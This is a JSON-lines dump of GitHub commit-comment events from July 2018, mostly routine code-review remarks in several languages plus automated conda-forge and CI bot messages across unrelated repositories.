{"id":"7970158357","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29719171,"position":9,"line":9,"path":"test/account-mgmt.test.js","commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-16T11:46:51Z","updated_at":"2018-07-16T11:46:51Z","author_association":"NONE","body":"There is something unsettling that this `ctx` contains supposedly immutable things, i.e. `ctx.actors` and things that change in `beforeEach`, i.e. `ctx.contracts`. \r\nPlus, these `init` functions obfuscate what we obtain.\r\nWhat about:\r\n\r\n```javascript\r\nconst alice = accounts[0];\r\nlet splitter;\r\n\r\nbeforeEach(\"\", () => ... splitter = ...\r\n```"}},"created_at":"2018-07-16T11:46:51Z"}
{"id":"7970159203","type":"CommitCommentEvent","actor":{"login":"rxmenezes"},"repo":{"name":"rxmenezes/rscreenorm"},"payload":{"comment":{"id":29719173,"position":null,"line":null,"path":null,"commit_id":"4403e63882cddca420366836b66085b9d251f646","created_at":"2018-07-16T11:47:05Z","updated_at":"2018-07-16T11:47:05Z","author_association":"OWNER","body":"This contains the linux binary"}},"created_at":"2018-07-16T11:47:05Z"}
{"id":"7970159504","type":"CommitCommentEvent","actor":{"login":"pad52"},"repo":{"name":"espressif/esp-idf"},"payload":{"comment":{"id":29719174,"position":15,"line":117,"path":"examples/bluetooth/a2dp_sink/main/main.c","commit_id":"21af1d73399d5f70ca7799ef90a233e0d0e7e52c","created_at":"2018-07-16T11:47:09Z","updated_at":"2018-07-16T11:47:09Z","author_association":"NONE","body":"Yes the typo is in many examples, I suggest to do a search/replace in all of the commit.\r\nDid you managed to get this (the a2dp_sink) example pairing (with a device like phone or notebook) working? 'cause I cannot really managed to make it working regardless of iocap settings"}},"created_at":"2018-07-16T11:47:09Z"}
{"id":"7970161142","type":"CommitCommentEvent","actor":{"login":"Soulofdestiny"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29719183,"position":null,"line":null,"path":null,"commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-16T11:47:32Z","updated_at":"2018-07-16T11:47:32Z","author_association":"OWNER","body":"die ay_modified.xml und die Zeilen die von Git kommen am besten ignoriern... da is irgendwas schief gegangen :(\r\n\r\nIch werd die woche auch weiter dran arbeiten, dann schick ich noch mal ein update - aber ich hoffe die Grundidee ist verständlich"}},"created_at":"2018-07-16T11:47:32Z"}
{"id":"7970163159","type":"CommitCommentEvent","actor":{"login":"rxmenezes"},"repo":{"name":"rxmenezes/rscreenorm"},"payload":{"comment":{"id":29719194,"position":null,"line":null,"path":null,"commit_id":"4403e63882cddca420366836b66085b9d251f646","created_at":"2018-07-16T11:48:01Z","updated_at":"2018-07-16T11:48:01Z","author_association":"OWNER","body":"The first file contains the source package, and the second contains the linux binary"}},"created_at":"2018-07-16T11:48:01Z"}
{"id":"7970163319","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29719195,"position":9,"line":9,"path":"test/account-mgmt.test.js","commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-16T11:48:04Z","updated_at":"2018-07-16T11:48:04Z","author_association":"NONE","body":"And `SafeMath` is not a real library because its functions are `internal`, so the functions are \"copy-pasted\" into Splitter."}},"created_at":"2018-07-16T11:48:04Z"}
{"id":"7970165393","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/glymur-feedstock"},"payload":{"comment":{"id":29719198,"position":null,"line":null,"path":null,"commit_id":"82e07a9787f8e3d9f798863981c31e41464beec2","created_at":"2018-07-16T11:48:31Z","updated_at":"2018-07-16T11:48:31Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ehsteve were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @ehsteve were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T11:48:31Z"}
{"id":"7970165834","type":"CommitCommentEvent","actor":{"login":"wxwho"},"repo":{"name":"wxwho/calculator"},"payload":{"comment":{"id":29719200,"position":10,"line":10,"path":"main.c","commit_id":"f43c0a780bb4871d656a89bf35cf7388e3945368","created_at":"2018-07-16T11:48:39Z","updated_at":"2018-07-16T11:48:39Z","author_association":"OWNER","body":"변수를 의미가 알 수 있는 이름으로 변경하는 것이 좋겠습니다."}},"created_at":"2018-07-16T11:48:39Z"}
{"id":"7970165852","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29719201,"position":21,"line":21,"path":"test/account-mgmt.test.js","commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-16T11:48:39Z","updated_at":"2018-07-16T11:48:39Z","author_association":"NONE","body":"`const weiAmount = web3.toWei(10);`"}},"created_at":"2018-07-16T11:48:39Z"}
{"id":"7970167822","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29719205,"position":21,"line":21,"path":"test/account-mgmt.test.js","commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-16T11:49:05Z","updated_at":"2018-07-16T11:49:05Z","author_association":"NONE","body":"Use smaller numbers in your tests otherwise you will hit low fund problems."}},"created_at":"2018-07-16T11:49:05Z"}
{"id":"7970167872","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Silverlight1989/YII2"},"payload":{"comment":{"id":29719206,"position":14,"line":14,"path":".travis.yml","commit_id":"f37b009b79155dfe9ab8d0e33c74d7997cf7853e","created_at":"2018-07-16T11:49:06Z","updated_at":"2018-07-16T11:49:06Z","author_association":"CONTRIBUTOR","body":"travis - круто, но причем тут симфони?) \r\nЕсть конфиги трависа для yii2 - погугли лучше их. \r\nСимфонишные конфиги можно замучаться исправлять)"}},"created_at":"2018-07-16T11:49:06Z"}
{"id":"7970168573","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/google-auth-httplib2-feedstock"},"payload":{"comment":{"id":29719208,"position":null,"line":null,"path":null,"commit_id":"967fc4d95c7068041d8cdfdd9d74577caa06e887","created_at":"2018-07-16T11:49:15Z","updated_at":"2018-07-16T11:49:15Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jonparrott were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @jonparrott were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T11:49:15Z"}
{"id":"7970170363","type":"CommitCommentEvent","actor":{"login":"wxwho"},"repo":{"name":"wxwho/calculator"},"payload":{"comment":{"id":29719210,"position":13,"line":13,"path":"main.c","commit_id":"f43c0a780bb4871d656a89bf35cf7388e3945368","created_at":"2018-07-16T11:49:39Z","updated_at":"2018-07-16T11:49:39Z","author_association":"OWNER","body":"expression 뒤에 콜론과 공백을 추가하는 것은 어떨까요?"}},"created_at":"2018-07-16T11:49:39Z"}
{"id":"7970170946","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29719211,"position":26,"line":26,"path":"test/account-mgmt.test.js","commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-16T11:49:47Z","updated_at":"2018-07-16T11:49:47Z","author_association":"NONE","body":"`const txObj = await ctx.contracts.splitter.deposit(`\r\nThen you test the content of `txObj`."}},"created_at":"2018-07-16T11:49:47Z"}
{"id":"7970172974","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29719215,"position":33,"line":33,"path":"test/account-mgmt.test.js","commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-16T11:50:15Z","updated_at":"2018-07-16T11:50:15Z","author_association":"NONE","body":"Not sure why you have a second `describe` for the same thing."}},"created_at":"2018-07-16T11:50:15Z"}
{"id":"7970173241","type":"CommitCommentEvent","actor":{"login":"elifaln"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29719217,"position":7,"line":964,"path":"lib/main_common.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-16T11:50:18Z","updated_at":"2018-07-16T11:50:18Z","author_association":"NONE","body":"Hi @Soulofdestiny, that will work only for the TOOL_s390_xxx test cases but we have also other testcases which are called MEMORY_xxx, KERNEL_xxx etc. "}},"created_at":"2018-07-16T11:50:18Z"}
{"id":"7970175685","type":"CommitCommentEvent","actor":{"login":"sap-coutantm"},"repo":{"name":"sap-coutantm/InfraBox"},"payload":{"comment":{"id":29719221,"position":null,"line":null,"path":null,"commit_id":"2ceb8e8fadeaad54d61b5014c53e8b4db1ab24b3","created_at":"2018-07-16T11:50:51Z","updated_at":"2018-07-16T11:50:51Z","author_association":"OWNER","body":"forgot to add the deletion of the old files in this commit"}},"created_at":"2018-07-16T11:50:51Z"}
{"id":"7970185131","type":"CommitCommentEvent","actor":{"login":"MarcinKosinski"},"repo":{"name":"cpsievert/LDAvis"},"payload":{"comment":{"id":29719232,"position":11,"line":307,"path":"R/createJSON.R","commit_id":"c7234d71168b1e946a361bc00593bc5c4bf8e57e","created_at":"2018-07-16T11:53:01Z","updated_at":"2018-07-16T11:53:01Z","author_association":"CONTRIBUTOR","body":"If think we also should pay attention to the moment LHS and RHS are both 0. \r\n`dist.mat[is.na(dist.mat)] <- 0` after calculating dist.mat should be enough"}},"created_at":"2018-07-16T11:53:01Z"}
{"id":"7970185738","type":"CommitCommentEvent","actor":{"login":"Gasparsa"},"repo":{"name":"ManoMax/LEDA"},"payload":{"comment":{"id":29719233,"position":null,"line":null,"path":null,"commit_id":"e84e5a50e8112a0279ceeff65698fe780fc346e2","created_at":"2018-07-16T11:53:09Z","updated_at":"2018-07-16T11:53:09Z","author_association":"NONE","body":"o cara é bem demais. capital tocantins , capital tocantins "}},"created_at":"2018-07-16T11:53:09Z"}
{"id":"7970186863","type":"CommitCommentEvent","actor":{"login":"Gasparsa"},"repo":{"name":"ManoMax/LEDA"},"payload":{"comment":{"id":29719236,"position":1,"line":9,"path":"RoteiroOficial15/R15-01-Rot-SkipList-environment/src/main/java/adt/skipList/SkipListImpl.java","commit_id":"e84e5a50e8112a0279ceeff65698fe780fc346e2","created_at":"2018-07-16T11:53:25Z","updated_at":"2018-07-16T11:53:25Z","author_association":"NONE","body":"muito top\r\n"}},"created_at":"2018-07-16T11:53:25Z"}
{"id":"7970188570","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719240,"position":6,"line":13,"path":"app/forms.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T11:53:50Z","updated_at":"2018-07-16T11:53:50Z","author_association":"NONE","body":"в конце добавить пустую строку"}},"created_at":"2018-07-16T11:53:50Z"}
{"id":"7970190850","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719243,"position":6,"line":4,"path":"app/models.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T11:54:22Z","updated_at":"2018-07-16T11:54:22Z","author_association":"NONE","body":"убрать закомментированный код"}},"created_at":"2018-07-16T11:54:22Z"}
{"id":"7970193760","type":"CommitCommentEvent","actor":{"login":"MaximePolicarpo"},"repo":{"name":"MaximePolicarpo/Molecular-decay-of-light-processing-genes-in-cavefishes"},"payload":{"comment":{"id":29719248,"position":null,"line":null,"path":null,"commit_id":"1c58e2d3abf6fe4dce0d0aff441638bb8ad048d0","created_at":"2018-07-16T11:55:01Z","updated_at":"2018-07-16T11:55:01Z","author_association":"OWNER","body":"1/07/2018"}},"created_at":"2018-07-16T11:55:01Z"}
{"id":"7970195880","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719250,"position":5,"line":5,"path":"RockPaperScissorsUtils.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T11:55:31Z","updated_at":"2018-07-16T11:55:31Z","author_association":"NONE","body":"Strings are convenient for the human but a waste of gas for the contract.\r\nConsider using `uint` 1 to 3, or `enum`."}},"created_at":"2018-07-16T11:55:31Z"}
{"id":"7970196360","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29719253,"position":null,"line":null,"path":null,"commit_id":"41f8e39f4bc39100fbd959e3a116f096f5f42629","created_at":"2018-07-16T11:55:39Z","updated_at":"2018-07-16T11:55:39Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.03%25-green.png)</a>\n"}},"created_at":"2018-07-16T11:55:39Z"}
{"id":"7970197443","type":"CommitCommentEvent","actor":{"login":"Soulofdestiny"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29719255,"position":7,"line":964,"path":"lib/main_common.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-16T11:55:55Z","updated_at":"2018-07-16T11:55:55Z","author_association":"OWNER","body":"that's fine, it makes sense to split them like this I guess.\r\nso we have different Testsuites for Kerneltests, memorytests, tooltests etc.\r\n\r\nso for example we could introduce another variable for TESTSETS which we assign a value to and load/execute them accordingly from the correct folder.\r\n\r\nsomething like\r\n\r\n```\r\nif (get_var('IBM_TESTS')) {\r\n    my $testset = get_var('IBM_TESTSET'); # e.g. \"KERNEL or TOOL or MEMORY\"\r\n    foreach my $tc (split(',', get_var('IBM_TESTS'))) {\r\n        loadtest \"s390x_tests/$testset_s390_$tc/consoletest_$tc\";\r\n```\r\n\r\nwhat do you think?\r\n"}},"created_at":"2018-07-16T11:55:55Z"}
{"id":"7970201732","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719268,"position":12,"line":10,"path":"app/models.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T11:56:56Z","updated_at":"2018-07-16T11:56:56Z","author_association":"NONE","body":"1. Сделать 'use'  константой\r\n2. переименовать 'use', не понятно для чего\r\n3. https://docs.djangoproject.com/en/2.0/ref/models/fields/#choices  - как сделать лучше"}},"created_at":"2018-07-16T11:56:56Z"}
{"id":"7970202183","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719269,"position":44,"line":44,"path":"RockPaperScissorsUtils.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T11:57:02Z","updated_at":"2018-07-16T11:57:02Z","author_association":"NONE","body":"A \"cheating\" way of comparing 2 strings is to compare their `keccak256`. Of course, it is possible to have a collision, i.e a false positive.\r\nBut see how you have to do acrobatics because you used strings."}},"created_at":"2018-07-16T11:57:02Z"}
{"id":"7970204431","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719270,"position":12,"line":10,"path":"app/models.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T11:57:31Z","updated_at":"2018-07-16T11:57:31Z","author_association":"NONE","body":"\r\n\r\n    Сделать 'use' константой\r\n    переименовать 'use', не понятно для чего\r\n    https://docs.djangoproject.com/en/2.0/ref/models/fields/#choices - как сделать лучше\r\n\r\n"}},"created_at":"2018-07-16T11:57:31Z"}
{"id":"7970204854","type":"CommitCommentEvent","actor":{"login":"konimex"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29719271,"position":null,"line":null,"path":null,"commit_id":"c3c0f517cc1ad60445e562a1d9b5e217f6f1c0f5","created_at":"2018-07-16T11:57:37Z","updated_at":"2018-07-16T11:57:37Z","author_association":"MEMBER","body":"Looks like the root dnscrypt process will create a child process with a proper username if we set the user.\r\n![2018-07-16-184922_1491x339_scrot](https://user-images.githubusercontent.com/15692230/42757251-818fd2fc-8929-11e8-88de-772dc1447607.png)\r\n\r\nAdmittedly, there's a bug if the service is stopped, the child process will be reparented by init instead of killed. I'll report to upstream to see if this is a bug or intended."}},"created_at":"2018-07-16T11:57:37Z"}
{"id":"7970206318","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719275,"position":17,"line":17,"path":"RockPaperScissorsUtils.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T11:57:58Z","updated_at":"2018-07-16T11:57:58Z","author_association":"NONE","body":"So if `looser == \"Hello\"`, then `looser` wins?"}},"created_at":"2018-07-16T11:57:58Z"}
{"id":"7970208278","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29719278,"position":null,"line":null,"path":null,"commit_id":"03f0e482ef4b7e0071b325809d75ec9ecc41c4cd","created_at":"2018-07-16T11:58:25Z","updated_at":"2018-07-16T11:58:25Z","author_association":"MEMBER","body":"That original link doesn't work in any context, it always returns the api_not_allowed()"}},"created_at":"2018-07-16T11:58:25Z"}
{"id":"7970208614","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719279,"position":27,"line":27,"path":"RockPaperScissorsUtils.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T11:58:29Z","updated_at":"2018-07-16T11:58:29Z","author_association":"NONE","body":"That's one expensive verification."}},"created_at":"2018-07-16T11:58:29Z"}
{"id":"7970210260","type":"CommitCommentEvent","actor":{"login":"ch11y"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29719282,"position":null,"line":null,"path":null,"commit_id":"03ab64c3a68f3b990bf690ede06e3066ad4e35a0","created_at":"2018-07-16T11:58:51Z","updated_at":"2018-07-16T11:58:51Z","author_association":"NONE","body":"it seems the issue is still here. "}},"created_at":"2018-07-16T11:58:51Z"}
{"id":"7970212062","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719287,"position":30,"line":27,"path":"app/models.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T11:59:17Z","updated_at":"2018-07-16T11:59:17Z","author_association":"NONE","body":"В скобках убрать пробелы между знаком \"=\" и величиной"}},"created_at":"2018-07-16T11:59:17Z"}
{"id":"7970212779","type":"CommitCommentEvent","actor":{"login":"veitveit"},"repo":{"name":"ProtProtocols/IsoLabeledProtocol"},"payload":{"comment":{"id":29719288,"position":null,"line":null,"path":null,"commit_id":"f22d5812f96a4f54fb56dcdee9475991b519ded7","created_at":"2018-07-16T11:59:26Z","updated_at":"2018-07-16T11:59:26Z","author_association":"COLLABORATOR","body":"Solved partly #42 "}},"created_at":"2018-07-16T11:59:26Z"}
{"id":"7970213606","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719289,"position":21,"line":21,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T11:59:36Z","updated_at":"2018-07-16T11:59:36Z","author_association":"NONE","body":"That would look good as an `enum`."}},"created_at":"2018-07-16T11:59:36Z"}
{"id":"7970221075","type":"CommitCommentEvent","actor":{"login":"talamortis"},"repo":{"name":"azerothcore/mod-vas-autobalance"},"payload":{"comment":{"id":29719309,"position":null,"line":null,"path":null,"commit_id":"f2233423fc38ccaec5ebaa9807c7aadc2af8a0f5","created_at":"2018-07-16T12:01:10Z","updated_at":"2018-07-16T12:01:10Z","author_association":"MEMBER","body":"yehonal is back? Why not speak on discord. "}},"created_at":"2018-07-16T12:01:10Z"}
{"id":"7970223551","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719314,"position":4,"line":16,"path":"app/views.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T12:01:41Z","updated_at":"2018-07-16T12:01:41Z","author_association":"NONE","body":"для того чтобы было понятно не только тебе, но и другому разработчику надо давать понятные имена переменным. Лучше переименовать из login в login_form"}},"created_at":"2018-07-16T12:01:41Z"}
{"id":"7970227140","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719328,"position":19,"line":27,"path":"app/views.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T12:02:26Z","updated_at":"2018-07-16T12:02:26Z","author_association":"NONE","body":"перенеси в manager (models.py)"}},"created_at":"2018-07-16T12:02:26Z"}
{"id":"7970227959","type":"CommitCommentEvent","actor":{"login":"sanaullah-ashfat"},"repo":{"name":"KGPML/Deep-Vessel"},"payload":{"comment":{"id":29719330,"position":null,"line":null,"path":null,"commit_id":"a7fe7a029aca7d2b1b25d98d8c140e92495c61a2","created_at":"2018-07-16T12:02:36Z","updated_at":"2018-07-16T12:02:36Z","author_association":"NONE","body":"when I running the code I have an error. how can i solve it?\r\nTraceback (most recent call last):\r\n  File \"C:\\Users\\Sanaullah Chowdhury\\Videos\\project\\Data\\Deep-Vessel\\Scripts\\v3_graph_batch_norm.py\", line 561, in <module>\r\n    main()\r\n  File \"C:\\Users\\Sanaullah Chowdhury\\Videos\\project\\Data\\Deep-Vessel\\Scripts\\v3_graph_batch_norm.py\", line 550, in main\r\n    run_training()\r\n  File \"C:\\Users\\Sanaullah Chowdhury\\Videos\\project\\Data\\Deep-Vessel\\Scripts\\v3_graph_batch_norm.py\", line 490, in run_training\r\n    is_training=True)\r\n  File \"C:\\Users\\Sanaullah Chowdhury\\Videos\\project\\Data\\Deep-Vessel\\Scripts\\v3_graph_batch_norm.py\", line 328, in fill_feed_dict\r\n    batch, current_img_ind, data_set= next_batch(batch_size, data_set, current_img_ind)\r\n  File \"C:\\Users\\Sanaullah Chowdhury\\Videos\\project\\Data\\Deep-Vessel\\Scripts\\v3_graph_batch_norm.py\", line 75, in next_batch\r\n    batch_y[i - current_batch_ind][int(df.loc[i][PATCH_DIM**2*3])]=1\r\nValueError: cannot convert float NaN to integer"}},"created_at":"2018-07-16T12:02:36Z"}
{"id":"7970228726","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719332,"position":63,"line":63,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T12:02:47Z","updated_at":"2018-07-16T12:02:47Z","author_association":"NONE","body":"So `.ante` is like a well-known passcode? Is it to double-confirm you mentioned the correct `gameId`?"}},"created_at":"2018-07-16T12:02:47Z"}
{"id":"7970228946","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719334,"position":47,"line":51,"path":"app/views.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T12:02:50Z","updated_at":"2018-07-16T12:02:50Z","author_association":"NONE","body":"убрать все print"}},"created_at":"2018-07-16T12:02:50Z"}
{"id":"7970228985","type":"CommitCommentEvent","actor":{"login":"ruxandravr"},"repo":{"name":"ruxandravr/CTCI"},"payload":{"comment":{"id":29719335,"position":9,"line":8,"path":"Chapter1/tests/ArraysAndStrings_test.cpp","commit_id":"9dbf756cdde1db8e5064c05264e222f832056d42","created_at":"2018-07-16T12:02:50Z","updated_at":"2018-07-16T12:02:50Z","author_association":"OWNER","body":"Very smart!"}},"created_at":"2018-07-16T12:02:50Z"}
{"id":"7970232335","type":"CommitCommentEvent","actor":{"login":"LopaWang"},"repo":{"name":"LopaWang/intercomWXTG-dev"},"payload":{"comment":{"id":29719340,"position":null,"line":null,"path":null,"commit_id":"47b63a2d07de86dc0ab1ce31234d8f4a3bec857e","created_at":"2018-07-16T12:03:33Z","updated_at":"2018-07-16T12:03:33Z","author_association":"OWNER","body":"是"}},"created_at":"2018-07-16T12:03:33Z"}
{"id":"7970232598","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719341,"position":28,"line":40,"path":"app/views.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T12:03:37Z","updated_at":"2018-07-16T12:03:37Z","author_association":"NONE","body":"переименовать 'r', не понятно для чего, опять же правильное название переменной"}},"created_at":"2018-07-16T12:03:37Z"}
{"id":"7970232924","type":"CommitCommentEvent","actor":{"login":"LopaWang"},"repo":{"name":"LopaWang/intercomWXTG-dev"},"payload":{"comment":{"id":29719344,"position":null,"line":null,"path":null,"commit_id":"47b63a2d07de86dc0ab1ce31234d8f4a3bec857e","created_at":"2018-07-16T12:03:42Z","updated_at":"2018-07-16T12:03:42Z","author_association":"OWNER","body":"我"}},"created_at":"2018-07-16T12:03:42Z"}
{"id":"7970235936","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719350,"position":34,"line":47,"path":"app/views.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T12:04:21Z","updated_at":"2018-07-16T12:04:21Z","author_association":"NONE","body":"надо дать описывающее название функции"}},"created_at":"2018-07-16T12:04:21Z"}
{"id":"7970236622","type":"CommitCommentEvent","actor":{"login":"amay-oa777"},"repo":{"name":"amay-oa777/study"},"payload":{"comment":{"id":29719353,"position":null,"line":null,"path":null,"commit_id":"57161059fa3388ee0ad916a00308132c43df69a4","created_at":"2018-07-16T12:04:30Z","updated_at":"2018-07-16T12:04:30Z","author_association":"OWNER","body":"検証環境情報"}},"created_at":"2018-07-16T12:04:30Z"}
{"id":"7970237765","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719355,"position":null,"line":null,"path":null,"commit_id":"25dd9d25657b57ea2ba870c15d18a7ea116faa38","created_at":"2018-07-16T12:04:47Z","updated_at":"2018-07-16T12:04:47Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 532](https://ci.hashicorp.engineering/viewLog.html?buildId=104086&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T12:04:47Z"}
{"id":"7970238775","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719358,"position":71,"line":71,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T12:05:02Z","updated_at":"2018-07-16T12:05:02Z","author_association":"NONE","body":"Oh! Then why ask the player to \"say\" `anti`, when the contract can just go `balances[msg.sender] -= game.ante`..."}},"created_at":"2018-07-16T12:05:02Z"}
{"id":"7970240054","type":"CommitCommentEvent","actor":{"login":"martinpitt"},"repo":{"name":"sabbaka/cockpit"},"payload":{"comment":{"id":29719360,"position":4,"line":225,"path":"test/verify/check-storage-luks","commit_id":"33872af37da601cac27f1003ae85d3e4904adcf3","created_at":"2018-07-16T12:05:20Z","updated_at":"2018-07-16T12:05:20Z","author_association":"NONE","body":"What is this testing in particular? `testPassphrase` sounds a bit generic, and `testLuks()` is already doing that."}},"created_at":"2018-07-16T12:05:20Z"}
